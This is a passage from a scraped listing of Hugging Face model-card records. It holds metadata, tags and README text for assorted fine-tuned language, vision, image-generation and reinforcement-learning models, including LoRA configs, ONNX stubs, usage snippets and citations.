| LFM2-700M | 49.9 | 28.48 | 72.23 | 20.56 | 46.4 | 45.36 | 43.28 |
| LFM2-1.2B | *55.23* | **31.47** | **74.89** | *20.7* | *58.3* | *55.04* | **46.73** |
| Qwen3-0.6B | 44.93 | 22.14 | 64.24 | 19.75 | 36.47 | 41.28 | 30.84 |
| Qwen3-1.7B | **59.11** | 27.72 | *73.98* | **21.27** | 51.4 | **66.56** | *46.51* |
| Llama-3.2-1B-Instruct | 46.6 | *28.84* | 52.39 | 16.86 | 35.71 | 29.12 | 38.15 |
| gemma-3-1b-it | 40.08 | 21.07 | 62.9 | 17.72 | **59.59** | 43.6 | 34.43 |
### 2. LLM-as-a-Judge


### 3. Inference
#### Throughput comparison on CPU in ExecuTorch

#### Throughput comparison on CPU in Llama.cpp

## 📬 Contact
If you are interested in custom solutions with edge deployment, please contact [our sales team](https://www.liquid.ai/contact).
|
KU-AGI/OSPO-Janus-1B
|
KU-AGI
| 2025-09-23T14:48:29Z | 6 | 0 |
transformers
|
[
"transformers",
"pytorch",
"multi_modality",
"en",
"arxiv:2506.02015",
"base_model:deepseek-ai/Janus-1.3B",
"base_model:finetune:deepseek-ai/Janus-1.3B",
"license:mit",
"endpoints_compatible",
"region:us"
] | null | 2025-09-19T01:41:26Z |
---
library_name: transformers
license: mit
language:
- en
base_model:
- deepseek-ai/Janus-1.3B
---
# Model Card
Official model checkpoint for **"OSPO: Object-centric Self-improving Preference Optimization for Text-to-Image Generation"**.
- Paper: [Arxiv](https://arxiv.org/abs/2506.02015)
- Code: [Github](https://github.com/KU-AGI/OSPO)
|
galuis116/7cc89945-bb68-4cf0-a50b-d3a2b05df69c
|
galuis116
| 2025-09-23T14:47:31Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"llama",
"axolotl",
"generated_from_trainer",
"base_model:JackFram/llama-68m",
"base_model:adapter:JackFram/llama-68m",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:44:27Z |
---
library_name: peft
license: apache-2.0
base_model: JackFram/llama-68m
tags:
- axolotl
- generated_from_trainer
model-index:
- name: 7cc89945-bb68-4cf0-a50b-d3a2b05df69c
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
adapter: lora
base_model: JackFram/llama-68m
bf16: auto
chat_template: llama3
dataset_prepared_path: null
datasets:
- data_files:
- a3b62b21faf77258_train_data.json
ds_type: json
format: custom
path: /workspace/input_data/
type:
field_input: input
field_instruction: instruction
field_output: output
field_system: system
format: '{instruction} {input}'
no_input_format: '{instruction}'
system_format: '{system}'
system_prompt: ''
debug: null
deepspeed: null
early_stopping_patience: null
eval_max_new_tokens: 128
eval_table_size: null
evals_per_epoch: 4
flash_attention: false
fp16: null
fsdp: null
fsdp_config: null
gradient_accumulation_steps: 4
gradient_checkpointing: false
group_by_length: false
hub_model_id: galuis116/7cc89945-bb68-4cf0-a50b-d3a2b05df69c
learning_rate: 0.0002
load_in_4bit: false
load_in_8bit: false
local_rank: null
logging_steps: 1
lora_alpha: 16
lora_dropout: 0.05
lora_fan_in_fan_out: null
lora_model_dir: null
lora_r: 8
lora_target_linear: true
lr_scheduler: cosine
max_steps: 10
micro_batch_size: 2
mlflow_experiment_name: /tmp/a3b62b21faf77258_train_data.json
model_type: AutoModelForCausalLM
num_epochs: 1
optimizer: adamw_bnb_8bit
output_dir: /root/.cache/huggingface/hub/trained_repo
pad_to_sequence_len: true
resume_from_checkpoint: null
s2_attention: null
sample_packing: false
saves_per_epoch: 4
sequence_len: 512
special_tokens:
pad_token: </s>
strict: false
tf32: false
tokenizer_type: AutoTokenizer
train_on_inputs: false
trust_remote_code: true
val_set_size: 0.05
wandb_entity: null
wandb_mode: offline
wandb_name: cbbcd038-7a17-4c49-a285-8321f9194ce5
wandb_project: Gradients-On-Demand
wandb_run: your_name
wandb_runid: cbbcd038-7a17-4c49-a285-8321f9194ce5
warmup_steps: 10
weight_decay: 0.0
xformers_attention: null
```
</details><br>
# 7cc89945-bb68-4cf0-a50b-d3a2b05df69c
This model is a fine-tuned version of [JackFram/llama-68m](https://huggingface.co/JackFram/llama-68m) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.1210
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 10
- training_steps: 10
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 2.6477 | 0.0003 | 1 | 3.1443 |
| 2.9189 | 0.0009 | 3 | 3.1439 |
| 2.7182 | 0.0019 | 6 | 3.1381 |
| 3.1061 | 0.0028 | 9 | 3.1210 |
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.0
- Pytorch 2.5.0+cu124
- Datasets 3.0.1
- Tokenizers 0.20.1
|
alpcaferoglu/Qwen2.5-Coder-3B-Instruct_bd_cs_t2sws-t2s_r64_a64_e1_bs2_gas4_lr7.5e-05_fs0f_cvdt_sftreason
|
alpcaferoglu
| 2025-09-23T14:46:06Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"unsloth",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T02:12:23Z |
---
library_name: transformers
tags:
- unsloth
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
echarlaix/tiny-random-gpt-oss-mxfp4
|
echarlaix
| 2025-09-23T14:45:28Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gpt_oss",
"text-generation",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"mxfp4",
"region:us"
] |
text-generation
| 2025-09-23T14:38:11Z |
---
license: apache-2.0
pipeline_tag: text-generation
library_name: transformers
---
|
johngreendr1/bfe3b72f-08eb-4ad4-a14d-1acb287819b7
|
johngreendr1
| 2025-09-23T14:44:37Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:jingyeom/seal3.1.6n_7b",
"base_model:adapter:jingyeom/seal3.1.6n_7b",
"region:us"
] | null | 2025-09-23T14:44:30Z |
---
base_model: jingyeom/seal3.1.6n_7b
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.1
|
OxoGhost/poca-SoccerTwos
|
OxoGhost
| 2025-09-23T14:44:33Z | 0 | 0 |
ml-agents
|
[
"ml-agents",
"tensorboard",
"onnx",
"SoccerTwos",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SoccerTwos",
"region:us"
] |
reinforcement-learning
| 2025-09-23T14:44:27Z |
---
library_name: ml-agents
tags:
- SoccerTwos
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SoccerTwos
---
# **poca** Agent playing **SoccerTwos**
This is a trained model of a **poca** agent playing **SoccerTwos**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how works ML-Agents:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: OxoGhost/poca-SoccerTwos
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
onnxmodelzoo/resnext50d_32x4d_Opset17
|
onnxmodelzoo
| 2025-09-23T14:43:58Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:50Z |
---
language: en
license: apache-2.0
model_name: resnext50d_32x4d_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext26ts_Opset18
|
onnxmodelzoo
| 2025-09-23T14:43:14Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:08Z |
---
language: en
license: apache-2.0
model_name: resnext26ts_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext26ts_Opset16
|
onnxmodelzoo
| 2025-09-23T14:43:02Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:42:56Z |
---
language: en
license: apache-2.0
model_name: resnext26ts_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext101_32x8d_Opset18
|
onnxmodelzoo
| 2025-09-23T14:42:56Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:42:38Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x8d_Opset18.onnx
tags:
- Computer_Vision
---
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64-0922195521-epoch-8
|
vectorzhou
| 2025-09-23T14:42:54Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T13:31:34Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64-0922195521-epoch-8", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/09vdah42)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
StrategyAI/strategy-neon-krea
|
StrategyAI
| 2025-09-23T14:42:19Z | 0 | 0 |
diffusers
|
[
"diffusers",
"text-to-image",
"lora",
"template:diffusion-lora",
"base_model:black-forest-labs/FLUX.1-Krea-dev",
"base_model:adapter:black-forest-labs/FLUX.1-Krea-dev",
"region:us"
] |
text-to-image
| 2025-09-23T14:40:48Z |
---
tags:
- text-to-image
- lora
- diffusers
- template:diffusion-lora
widget:
- output:
url: images/neon-krea-1.jpg
text: 'A dolphin glowing with neon orange light leaping gracefully from dark midnight waters under a starry sky. The sea reflects shimmering orange neon trails, symbolizing strategy and flow futuristic and mysterious.'
- output:
url: images/neon-krea-2.jpg
text: 'A glowing orange fruit glitches into fragments of neon pixels and cascading streams of electric code. Seeds transform into sleek glowing tokens, orbiting like satellites with neon trails. The background is a futuristic cyber skyline with dark indigo skies, glowing circuits, and electric orange highlights.'
- output:
url: images/neon-krea-3.jpg
text: 'a cheetah running through neon lit city streets, orange and amber tiles for the cheetah the night sky above filled with stars and glowing orange galaxy patterns reflections on wet pavement artistic mosaic style with cosmic and urban fusion'
- output:
url: images/neon-krea-4.jpg
text: 'A dark futuristic background with a glowing neon pathway leading into the horizon illuminated with radiant orange and subtle blue neon lights. The pathway appears three dimensional surrounded by abstract digital light effects and faint glowing grids. Inspirational and motivational theme elegant and professional high resolution'
- output:
url: images/neon-krea-5.jpg
text: 'an orange shiny futuristic city in the night, pedestrians wearing orange neon outfit, cinematic, shot on film, detailed textures'
- output:
url: images/neon-krea-6.jpg
text: 'Rolling desert dunes under a deep orange sky long shadows stretching across sand cinematic and the warm glow moody and tranquil highly detailed.'
base_model: black-forest-labs/FLUX.1-Krea-dev
instance_prompt: NeonPainterKrea
---
# strategy-neon-krea
<Gallery />
## Model description
strategy-neon-krea is a FLUX.1-Krea-dev LoRA based on Strategy Neon imagery.
## Try the model
You can try the model on our [Discord Server](https://discord.gg/qNNYyztXes)
## Trigger words
You should use NeonPainterKrea to trigger the image generation.
## Download model
[Download](/StrategyAI/strategy-neon-krea/tree/main) them in the Files & versions tab.
## License
This model falls under the [FLUX.1 [dev] Non-Commercial License](https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md).
|
onnxmodelzoo/resnext101_32x8d_Opset16
|
onnxmodelzoo
| 2025-09-23T14:42:18Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:41:58Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x8d_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext101_32x4d_Opset17
|
onnxmodelzoo
| 2025-09-23T14:41:47Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:41:36Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x4d_Opset17.onnx
tags:
- Computer_Vision
---
|
septemberendto/Qwen3-0.6B-Gensyn-Swarm-nimble_scaly_walrus
|
septemberendto
| 2025-09-23T14:41:15Z | 95 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"rl-swarm",
"genrl-swarm",
"grpo",
"gensyn",
"I am nimble_scaly_walrus",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-20T19:13:42Z |
---
library_name: transformers
tags:
- rl-swarm
- genrl-swarm
- grpo
- gensyn
- I am nimble_scaly_walrus
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
onnxmodelzoo/resnetv2_50x1_bitm_Opset16
|
onnxmodelzoo
| 2025-09-23T14:41:09Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:40:56Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50x1_bitm_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50d_gn_Opset18
|
onnxmodelzoo
| 2025-09-23T14:39:47Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:39Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_gn_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50d_gn_Opset16
|
onnxmodelzoo
| 2025-09-23T14:39:29Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:19Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_gn_Opset16.onnx
tags:
- Computer_Vision
---
|
mawiie/SmolLM3-3B-Base-Plain
|
mawiie
| 2025-09-23T14:39:28Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"sft",
"trl",
"base_model:HuggingFaceTB/SmolLM3-3B-Base",
"base_model:finetune:HuggingFaceTB/SmolLM3-3B-Base",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T13:04:35Z |
---
base_model: HuggingFaceTB/SmolLM3-3B-Base
library_name: transformers
model_name: SmolLM3-3B-Base-Plain
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for SmolLM3-3B-Base-Plain
This model is a fine-tuned version of [HuggingFaceTB/SmolLM3-3B-Base](https://huggingface.co/HuggingFaceTB/SmolLM3-3B-Base).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="mawiie/SmolLM3-3B-Base-Plain", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
